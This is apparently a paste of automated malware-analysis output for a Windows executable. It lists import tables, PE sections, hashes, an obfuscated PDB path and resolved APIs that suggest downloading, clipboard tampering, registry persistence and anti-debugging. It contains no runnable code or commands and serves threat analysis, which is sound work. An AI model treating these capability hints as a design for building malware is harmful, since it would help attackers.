- "name": "AreFileApisANSI",
- "address": "0x42b0fc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42b100"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42b104"
- },
- {
- "name": "HeapSize",
- "address": "0x42b108"
- },
- {
- "name": "HeapFree",
- "address": "0x42b10c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42b110"
- },
- {
- "name": "SetLastError",
- "address": "0x42b114"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42b118"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42b11c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42b120"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42b124"
- },
- {
- "name": "GetFileType",
- "address": "0x42b128"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42b12c"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42b130"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x42b134"
- },
- {
- "name": "WriteFile",
- "address": "0x42b138"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42b13c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42b140"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42b144"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42b148"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42b14c"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42b150"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42b154"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42b158"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42b15c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42b160"
- },
- {
- "name": "Sleep",
- "address": "0x42b164"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42b168"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42b16c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42b170"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42b174"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42b178"
- },
- {
- "name": "TlsFree",
- "address": "0x42b17c"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42b180"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42b184"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42b188"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42b18c"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42b190"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42b194"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42b198"
- },
- {
- "name": "GetACP",
- "address": "0x42b19c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42b1a0"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42b1a4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42b1a8"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42b1ac"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42b1b0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42b1b4"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42b1b8"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42b1bc"
- },
- {
- "name": "CompareStringW",
- "address": "0x42b1c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42b1c4"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42b1c8"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42b1cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42b1d0"
- },
- {
- "name": "CloseHandle",
- "address": "0x42b1d4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetMenuBarInfo",
- "address": "0x42b1dc"
- },
- {
- "name": "DrawTextExA",
- "address": "0x42b1e0"
- },
- {
- "name": "SetWindowsHookA",
- "address": "0x42b1e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x42b1e8"
- },
- {
- "name": "GetOpenClipboardWindow",
- "address": "0x42b1ec"
- },
- {
- "name": "ClientToScreen",
- "address": "0x42b1f0"
- }
- ],
- "dll": "USER32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0005251b",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x0005251b",
- "icon_hash": null,
- "entrypoint": "0x00407b76",
- "timestamp": "2018-07-23 08:18:02",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00029600",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x000294dd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002b000",
- "size_of_data": "0x00013200",
- "entropy": "6.07",
- "raw_address": "0x00029a00",
- "virtual_size": "0x000130b2",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x00002200",
- "entropy": "2.74",
- "raw_address": "0x0003cc00",
- "virtual_size": "0x00014cc8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00054000",
- "size_of_data": "0x00006400",
- "entropy": "6.31",
- "raw_address": "0x0003ee00",
- "virtual_size": "0x000063b0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0005b000",
- "size_of_data": "0x00002400",
- "entropy": "6.55",
- "raw_address": "0x00045200",
- "virtual_size": "0x000022a0",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d4fc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x00054000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000063b0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000022a0"
- },
- {
- "virtual_address": "0x0002b250",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0002b000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001f8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "1f9917f590ed0711a560b3a3a279ed67",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.SetErrorMode",
- "msvcrt.dll._controlfp",
- "msvcrt.dll._except_handler3",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__p__fmode",
- "msvcrt.dll.isalpha",
- "msvcrt.dll.__p__commode",
- "msvcrt.dll._adjust_fdiv",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._initterm",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll._acmdln",
- "msvcrt.dll.exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll._exit",
- "msvcrt.dll._snprintf",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fseek",
- "msvcrt.dll.ftell",
- "msvcrt.dll.wcsstr",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.srand",
- "msvcrt.dll.rand",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "wininet.dll.InternetOpenUrlA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetOpenA",
- "urlmon.dll.URLDownloadToFileW",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathFindFileNameA",
- "shlwapi.dll.PathFindFileNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.FindClose",
- "kernel32.dll.WriteFile",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.CreateProcessW",
- "user32.dll.SetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetClipboardData",
- "user32.dll.CloseClipboard",
- "user32.dll.CharUpperA",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegOpenKeyExW",
- "shell32.dll.ShellExecuteW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "msvcr100.dll.atexit",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.OpenServiceA",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FillConsoleOutputCharacterA",
- "address": "0x42b000"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42b004"
- },
- {
- "name": "GetNativeSystemInfo",
- "address": "0x42b008"
- },
- {
- "name": "SetLocaleInfoA",
- "address": "0x42b00c"
- },
- {
- "name": "WritePrivateProfileStructA",
- "address": "0x42b010"
- },
- {
- "name": "GetDefaultCommConfigW",
- "address": "0x42b014"
- },
- {
- "name": "FindResourceW",
- "address": "0x42b018"
- },
- {
- "name": "WaitNamedPipeA",
- "address": "0x42b01c"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x42b020"
- },
- {
- "name": "SetTapeParameters",
- "address": "0x42b024"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42b028"
- },
- {
- "name": "GetTickCount",
- "address": "0x42b02c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x42b030"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42b034"
- },
- {
- "name": "FormatMessageA",
- "address": "0x42b038"
- },
- {
- "name": "EnumTimeFormatsA",
- "address": "0x42b03c"
- },
- {
- "name": "EnumTimeFormatsW",
- "address": "0x42b040"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42b044"
- },
- {
- "name": "GetFirmwareEnvironmentVariableA",
- "address": "0x42b048"
- },
- {
- "name": "GetStringTypeExW",
- "address": "0x42b04c"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42b050"
- },
- {
- "name": "GetVolumePathNamesForVolumeNameW",
- "address": "0x42b054"
- },
- {
- "name": "ReplaceFileW",
- "address": "0x42b058"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x42b05c"
- },
- {
- "name": "CreateMailslotW",
- "address": "0x42b060"
- },
- {
- "name": "WritePrivateProfileStringW",
- "address": "0x42b064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x42b068"
- },
- {
- "name": "VerifyVersionInfoW",
- "address": "0x42b06c"
- },
- {
- "name": "GetProfileIntA",
- "address": "0x42b070"
- },
- {
- "name": "Module32First",
- "address": "0x42b074"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42b078"
- },
- {
- "name": "GetLongPathNameA",
- "address": "0x42b07c"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x42b080"
- },
- {
- "name": "HeapUnlock",
- "address": "0x42b084"
- },
- {
- "name": "MoveFileW",
- "address": "0x42b088"
- },
- {
- "name": "GetAtomNameA",
- "address": "0x42b08c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42b090"
- },
- {
- "name": "FindFirstVolumeMountPointW",
- "address": "0x42b094"
- },
- {
- "name": "OpenEventA",
- "address": "0x42b098"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x42b09c"
- },
- {
- "name": "OpenJobObjectW",
- "address": "0x42b0a0"
- },
- {
- "name": "GetThreadPriority",
- "address": "0x42b0a4"
- },
- {
- "name": "FindFirstChangeNotificationA",
- "address": "0x42b0a8"
- },
- {
- "name": "WriteProfileStringW",
- "address": "0x42b0ac"
- },
- {
- "name": "MoveFileWithProgressW",
- "address": "0x42b0b0"
- },
- {
- "name": "GetConsoleProcessList",
- "address": "0x42b0b4"
- },
- {
- "name": "ExpandEnvironmentStringsW",
- "address": "0x42b0b8"
- },
- {
- "name": "CreateFileW",
- "address": "0x42b0bc"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42b0c0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42b0c4"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42b0c8"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42b0cc"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42b0d0"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42b0d4"
- },
- {
- "name": "EncodePointer",
- "address": "0x42b0d8"
- },
- {
- "name": "DecodePointer",
- "address": "0x42b0dc"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42b0e0"
- },
- {
- "name": "RaiseException",
- "address": "0x42b0e4"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42b0e8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42b0ec"
- },
- {
- "name": "GetLastError",
- "address": "0x42b0f0"
- },
- {
- "name": "ExitProcess",
- "address": "0x42b0f4"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42b0f8"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x42b0fc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42b100"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42b104"
- },
- {
- "name": "HeapSize",
- "address": "0x42b108"
- },
- {
- "name": "HeapFree",
- "address": "0x42b10c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42b110"
- },
- {
- "name": "SetLastError",
- "address": "0x42b114"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42b118"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42b11c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42b120"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42b124"
- },
- {
- "name": "GetFileType",
- "address": "0x42b128"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42b12c"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42b130"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x42b134"
- },
- {
- "name": "WriteFile",
- "address": "0x42b138"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42b13c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42b140"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42b144"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42b148"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42b14c"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42b150"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42b154"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42b158"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42b15c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42b160"
- },
- {
- "name": "Sleep",
- "address": "0x42b164"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42b168"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42b16c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42b170"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42b174"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42b178"
- },
- {
- "name": "TlsFree",
- "address": "0x42b17c"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42b180"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42b184"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42b188"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42b18c"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42b190"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42b194"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42b198"
- },
- {
- "name": "GetACP",
- "address": "0x42b19c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42b1a0"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42b1a4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42b1a8"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42b1ac"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42b1b0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42b1b4"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42b1b8"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42b1bc"
- },
- {
- "name": "CompareStringW",
- "address": "0x42b1c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42b1c4"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42b1c8"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42b1cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42b1d0"
- },
- {
- "name": "CloseHandle",
- "address": "0x42b1d4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetMenuBarInfo",
- "address": "0x42b1dc"
- },
- {
- "name": "DrawTextExA",
- "address": "0x42b1e0"
- },
- {
- "name": "SetWindowsHookA",
- "address": "0x42b1e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x42b1e8"
- },
- {
- "name": "GetOpenClipboardWindow",
- "address": "0x42b1ec"
- },
- {
- "name": "ClientToScreen",
- "address": "0x42b1f0"
- }
- ],
- "dll": "USER32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0005251b",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x0005251b",
- "icon_hash": null,
- "entrypoint": "0x00407b76",
- "timestamp": "2018-07-23 08:18:02",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00029600",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x000294dd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002b000",
- "size_of_data": "0x00013200",
- "entropy": "6.07",
- "raw_address": "0x00029a00",
- "virtual_size": "0x000130b2",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x00002200",
- "entropy": "2.74",
- "raw_address": "0x0003cc00",
- "virtual_size": "0x00014cc8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00054000",
- "size_of_data": "0x00006400",
- "entropy": "6.31",
- "raw_address": "0x0003ee00",
- "virtual_size": "0x000063b0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0005b000",
- "size_of_data": "0x00002400",
- "entropy": "6.55",
- "raw_address": "0x00045200",
- "virtual_size": "0x000022a0",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d4fc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x00054000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000063b0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000022a0"
- },
- {
- "virtual_address": "0x0002b250",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0002b000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001f8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "1f9917f590ed0711a560b3a3a279ed67",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement